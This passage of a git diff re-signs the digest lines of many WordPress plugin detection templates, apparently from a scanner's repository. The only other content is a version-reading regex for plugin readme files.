diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 108da9ce84..4e03b046a6 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220289f0dab3ee5cedbc60ce7ff276558b78ede7faab53e33b3943d2144e11e4e130220489634c10d55f70b0250fdfc84995e4d2724bd8c3dc0c9716eb22d551c502e15:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ea131bc9561bc994c982c224f8c789c5a9d3ea040b46506db54edc897006577022100f14c71fce5fba005c35d003a0ce2199e1be445244941462244475ba1e0210d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index e13ec85f79..de8f845966 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220295bcb7504a30dfbc85d0f0fad5af53ccbb1a2ef852d16a5523d9ec0192c5d2402207b719acef31a8cc940bb2f6ca05695e28f14a876c138abcf86cc7fdee7190ff8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008e0261f905dffcf9268342f0fc90edd4a2f9710bfae765c2da63e1cf087588d5022100b06ccbb01a64019451127666bb57407deddf840f764db077349cfc0c3b93f854:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 4b3db970f8..4eb9384554 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a5bbc8f81ec077da1169307f04d11332d3e50549275766eaf31a78fa7265b1f70221009370bb8e9e830666c96ece74a6c8044aa4c59fd301093b8812442652e4066b27:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204944a336f25aac6de803cfea9af4d94d4da30f93f9b735b6a3a84fffd59a2830022100d7f550e528888dbee1d2acc47f2795790e5a53116ac3850d538bb37b5722835b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 57a1bd17a7..9614ce6e84 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a46a58b97d68e80f1c576fbcba884aba89ac2a74be009275e52bcd827c72c033022100e9f8ee43ab4c5090288b94d1a131c3a4e694410b2dba26dc3d74a6c07a668a14:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022064c04c4e7a945b8441b650ede0dd6e8dfdcce6026d0946d53dfb6362f3daa7f0022071c1414873ff8a24c1f3dd828ec8a2aa671a7f5e2615e1220555f929535bd462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index f94b0046c1..13823d296f 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220457192ef200e7331664554f7e071b74d203cd7d98284934b8393711dea969ad40220059905cb12ebc88ec4eaddb5d160d943d8990e2030f02a52d7bc984a89ddf182:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022079d947482d589d299d8cae7dc530f095db0d396d22fc8a17ee166f2d26f226ec022100af0f546716ff4e1a97cf3d4aa495f7ddb928842a24da3f33de5e13638b0fdb2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 0594f4da7a..a40dec4840 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022039302ad029bf5a1b0fe26044b91c634f228b10569b8da8682256400b4285644a02205f228bd0531741fbbcc22a1c48aa73272b54e288c9c85cf7bdfe5b4a9ac6f1bf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009913392bb150f785dd92b3feaa27a6d9a8df1cb0061549c270fe045607525a780220443bedb159ca8b66adedcd7d0290f38a2e5d80bbb0f1c8c233342c20c1c5a6b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d87a9e1dfb..dff8fc31e8 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bd14b52f925105d1a3b208fb725e8f8da596f8360ddbe9790bb987b340fba730022100b111dd8a4c58f1a2bf3cbad3d75e7a811e1a3e239c92522ccf8d77e5f4792896:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220735fb29a3cbc3d11daf728476cfd556401715ecf94f428cc6890ae2bb9d33738022100e1d3d98b1bcfacd20d00cb1396ac8dafb3b80149e81964f0c60d7a9efb26be64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 7135d9de4f..5b774f4c40 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d141a6ed28fe563c0e1de541a91d7fc79febfcd2f89a7bf805234be9db9b1055022100d4b97e9979efd60ccd441be3ad6f548487f4058b59368d2298777ae1283f4767:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cef02d0f2e2e9deafe06deeb60789036a0f92057edbd01b059c5edfd546dc041022100d6351e0475de3bd0606eefec35a0b8f92a8cf21e7a44503954f4c9513b1f2e89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index ae0383e358..187ab97df4 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fdfe55fbb0593d836745e87924f33232d1eb6c7927c404f0dd44317d0c98bec5022100c6237c28bfd066c6f309c031aa1d24cf411b59832211c31fb0d4405f2c7674e4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022042d332661f6030aaa1bd53b0bb3933df38b5e41baef5951e484b13db6a8e54de022059cf10f412a036dff5c0eb35078ade7dbabac06547d8921571bcf6f67f39e6e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 2339b58d15..f58b68be07 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d95964151d65496645482ea24acc006f0bc591cc55f57faf367ca2b95b9cdb80022100bc357eb9a2b54ec1a037c42ac56832b61f7fcd7703ead3cb293389230b66f9bd:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022034cdb9d78f9022d412a24bc12463126f6e3c7eae770350e1049111d0ed5b8bff022046a5ca4846e0d104d75e8001b2c6f5274e1b2eb65c6ee75eca21a4ba0b8ad876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 12bd0bffe8..bf08b4e28a 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a4f2064aac01e3e9a20fe7b66fc8837720fa8f7a70c65e3e913e9573175051a602207250c58cd5edf3f6ba5e2b2b76a02f4b6bd5a36d051e7df6775479a0317888c3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206e7179301d79062a0d7b30ead0c2aa1929d3fbaaf2c1984c6fd4bae9c20d1ac4022100f20a0c87793178bd3c5ada09394594aa3e0470ca7cc0fa6a6b102352c8080221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 34988d5e58..160fefaa4a 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c208d56b33b7418a5cb610bd31d48a9a7859017b00b54074e96082b3742bc3a8022100fdbb2ebe3eef918459432c8deac29f413797e477939b965041f3d4cc3b58d767:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200626eb201f057c62bf4ae8cf580badfd67695602504fa5008defc80db163ac30022100cd8f356389995e53b499929a42531f6d326efb4cced68400011cc275c161282e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 964850e620..c9e36b50b3 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207b0751725beb69c945a3e2b60648d2df2dc13527a68318da0be4861a7b3a19ab022010d4edb82e177162c4d436677b0842fba72c1022dd4e911e03817a4c11d82aa0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009230d0f128e9d893329290cefa0809625e7b87a18503fdbf297f067d860abdac022000bf8a4ff9edcdf33920000721fc2d49c0b4e0f4ce20daadcda9af06eabb0778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index cf582212a2..aafeb3b391 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220339c01997159cbf93e95da26a6c5937c60f3d453348fefc249f00b5deec3a9f9022100c960e57b20f2b14e654a0e801bc5ca1bfcb2e8a314cde65f2e6f3fefb12754c0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dc79ba085dfc93d798639d95cfe62549c01901c10ed0fc754bc6d3f0567c8bde022100c8ab93745f08bf80688a8b4b3769f5995afa0d30be586bd07eb96944229c6887:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index ce1f498e15..689930e76f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220037d8b03ae73936f26b3f9f020ff27fa2900b9b04024ed88eed27a4222a3845e022100a610250411056c84544bee780a0d21c4f9e04ba2fe60cbf0dd9dd71994ca983b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100885d72dbe69f2abf39ec9ff136d20218c09e61a795fc33555f2f6095823b81f9022100d8d2525c005d2bdc578aeb528d0fe0ddc43683bb16cb0712005c4e5028d51bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 3fd4c21771..92f73aa14b 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022058de2ffc84aa0c8c82094246cc7e2916e8779bee59e44c65b28074b6dc102cde02205f87a5c49fbf761c92e38e55f0299a7403953ecaaf7d2ce36838db19dffcc691:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201fcba9bf5e5a3a2b6b9bf3a6f4920eea8bf2e0704811411553a7d2f1ec129fec02207b6b2d05e0aa16342b0efac033e2b807b7438d50017e37c6ae38dffa22677674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index aa69e7ae55..878a4524e4 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201b49b8a5fd4e6c86d682711b2a98087c17f456e476bc737b9206d218b6c7cec50220396463b85bd804031ebe4502bb1382e8a4fbafebf5bfad3cf5bf2379bf682a92:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009bbe27f4faab22d1156c77a42dd58eadea8c479202558417fb2aaef7c3e5000b02200fae619173dc9931135b4865d4da26871bb038989380a189b96d0b0645b4b279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 766eed451a..771fdeca90 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100dad68e0d5e49d96549b3255ce97bfbbe110474dfd48923a16c414e0893e02804022100854515088550000f9f4b26bf21070bc3d8eff83fea28e7ede5f37f3b8bff3130:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220291aadbcfaeff4e8a1dba154ee628887867e85af1053dbf263a7cb5fd8391d3402201bd7a428587212c5156cb72bcd1e70b55b9d52dd61a527a844c5c4a990a992fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 9d5b5e7a97..12f571ee92 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100abd0a6371959f3883ff4b225ec83dc028b8051ab7bedcb85ec23482f03bfec03022070aa50f3b09773ab76bfe5ed661838d8ff1b69d578d0d8df6cfbfa861a6f5780:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100af2c27dd70b94021631963c023bd9bd457c0b2e12a5b4289f3ae2b964942b4ba02204e7d4f2a8928ff5cfd18f58c1b6698218b0c089491761457ea53880ec81715ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 39b0e8b13d..bda73b65e1 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210093168193fc98c11adcc3038a7ea53aeb8173e8c778f67583fcb25b247cea66910220136ab57b43d287c421e4083574c003159406e55a77051f7ffc804b5d0c136d1e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e3eaa7fda244c8ba7fce06da8457e9e262671fad15ecf571a2ab76bce49fc59302204c97ea4c3a55a57c9840bc2ba83c83f9ce935fd1437d174ca9384d2a2acbab54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 2ad5333553..1fae0d7336 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100cee96332eaf921af6ffe00b19eff089cdc36e4e9c083c2891d00c6ed29f420a3022039b024281837a5b63e234c2d4b29f805b617cdcbcf859d2d77027fe1d9b7de04:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dea47a1272d6b4b7f60d924b4d6adbc7b948ee629752c24a104131af89ef581a02204382823e97dbaefb1d0496e1fae2ee78e9793766bcb1ae6eebbc5cbe0f245fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 19ae23e269..5bcf06516a 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204c816523829afe97b1edf8874a170c5967133ee022da9a5e0ca167f5f2a319d90220013bb0fb88134fccb43e1a0e67154781c8de4d3e37609245a98c0f8917696d21:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202e0cc60d1e9525c11affb3a02d95953b8cd5c655bc3303dcf4772412d5d95560022016df55b268c3a0113b950c6118c99454eafb072f6db8a8da8aa2e9d36f849cb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 628d51d33c..a039de3966 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d51acd82ec0a9c1e66e7911d874453e66e630c6d3b7f76dc431af56132cd3eb8022100f6627220b9c64b6d1478bc39da8895c4ee7c260a862fad30877fe94c1d786690:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201571df9f868b71886e3e778337f1f46b7f9216e208fb14ac3019ba218d3d2b4e0221009b9d5037aaa4e84c5d72739a96121a5778a096e6434f566b65730673c931ac3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index ce6b894be4..a22b7a10f5 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d5a3387ce34f9b7c930e84ea718ff59b3fb544f8db3b47a4bb60255f6c996d5d022030989881a503f8dafd5ff164dfcc2d984c42a7e729e7d204d0d98b47f4a01af0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201de3ca57efa8c94bbac9fb1b177ee3f8036894d49acf5a062ba811349fa07f31022100976d684ee263bc2921b839af411e6559e46985cc0bf477291b31a595e73a514a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index e0f151e797..1d9c75ed11 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dbce6f65da66c8559f0dc64194c62caa4fe5376a60f75e8ad95a95cf4787703e02206abacee801776c294c37d8f1463f1285eeab3b61934b1b36e51533e31fe704b0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e83af713161b79880550349666c50fa329492f8282bc68ee5ff7111b31deabe50221008c8324bf13f2225c2e0ff1cfe4d5667ae88761f9c78194bba4c53b41ea65f436:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 79b96c4ef7..37726c8df4 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e3dd3182876e7287b47755ba9fa5097a2a5f5a5c105355ae5fa0fae1d0e55cce02210099382ae4c59ccce33e83c6208c6e42bbd154b45ddaee6627940672547bee3b94:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e9b4e62e526925009221b795d90995cefa7806e1064e16c4fe47024e4b7454610221009246a6cc00f728514fff191bad542c2f53f961a2bcd6a7352ef5dab912c77705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index ee162d3740..e8381dd9e2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d5160a1181f37283eaa6d055a062352688c90fdad88148faab1bab9b2c093adf022028e868c20adad0a5bb2fabd10ed3cf48cb77cb5b6a4b70eb1a7313658a6ba6cb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100935cd1d38c6b9865df9dada1d499f842310f4741a00c8638331e74b157a3e1aa02207ca347a4144315b2c372418eb1df67c4d98aae2f873317aaea307e87fa63b1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7c93d0315e..2440cf77de 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204a3a8656b814f7ca676cafc368086e7b3fafa08deeb10f61d64bbd3053471f0a02205c35ab772e6d0e5f6a233cf1f7156dded8dab29f1fffbcc282d35517e6ca907f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205d790f5d824062d7bec226c0a65ff01d39fc03a54d705451a3972a8b50371c060220267c3d15a8614ed6de3c38b41c1e4226a1a8bdd2b495938fb7288cbf7d8e9c61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 075c4ad880..a7ffda0d36 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022047ab98e1d28c9016fba32e86889bcecb430714afaa97eb0789a58f36a5b6ec5002203377a9ecadaee18d59ca8ca7baa3ff88ffcf7390828352d07300b54a7be279db:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205cf46ffdb7f0bb6039d9bab03270ffdcba792b99c172e6e2962e1315134e0a6d0220283b962aec36eaebbc212583964de3a34c2fac6a0262f2097be43363cd0f6038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 1de8bedba9..f397a3bc19 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b74e053436e1490e5bc59f788c85d548b8230b36a74c8bfec3d0df85a9756ffe022100c03ebeac7033ce5980b5bdd574e485ec9f5743de9ec602a96faba7eb6db2e67b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206409e863e80ad6c36f0b2f3c1369ee39594a75726debc05493986f9a7adf8a64022100f7844fd158c7aea807b913714787f2a7002b34218fae4e6916dd8d84b574014f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 88ac5e2121..72bfe419b8 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c7c659e7885e1b793bdcee8651507fd16a796e400646036aee5e64573814eb63022100c8232777c1a58eda5dbe88610a9696a5d7e03221d3ab52c5951f15756835d155:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d744ff21a1729b78b951faa4bafae4008b10f6f6363c60e4276ba8b5006b5250022036a20d93abb08cc1a1149f77746d011e9ba27475630abf70e18b26b30aac0f7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 045fd15af6..b4402dc4d3 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210084783c3e125824e7788a7a665b8985474c626448d8a88a8d3b8d46aec478eff8022100e24b5264e1392a8a01dd15fe9b88b77d94cf6696846635e35818de99ceb9ed04:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f282f9c9ded04f247e7defa2f59d961639a21e24a412e9411b5c8b893e7616fb0221009880191acbd0021fbda63450af51692a78453e38449b410e9ec6b0e931e07993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 711e6f2f36..438ce777b6 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220403d2d8b1dd9064e9c00fd5fe317032f99899d61bd3d41c53379d05ab8c6f714022100d3c30ec0f7ea076bfb9d262ffb32228e3806923653dccd5a07275e96583ee2eb:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203e5e434483fb5db4855f375e7221c018573572d27061410d4a5de03927dc8dc802204245832cbc882b8f0d9d52449c03e7057072485c6c87e98a73f92ccf446d229b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 9e24c724a2..06692bc850 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c096b962ad91b485dadebf48659294d353c5715447da4d3c48254665c1d417bf022026dccc0f337d419bbe3e06e8460412424da902956a72dc9b6182230de8d1c07f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022056eb0f455eb8134b56ad849e21cecef8d3fcd8be89d44afe84c884e4a9d872ad02206d0c4f4de6be14f435a310e8284e254d80fbe22458edd201a7c34015ecc616c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml 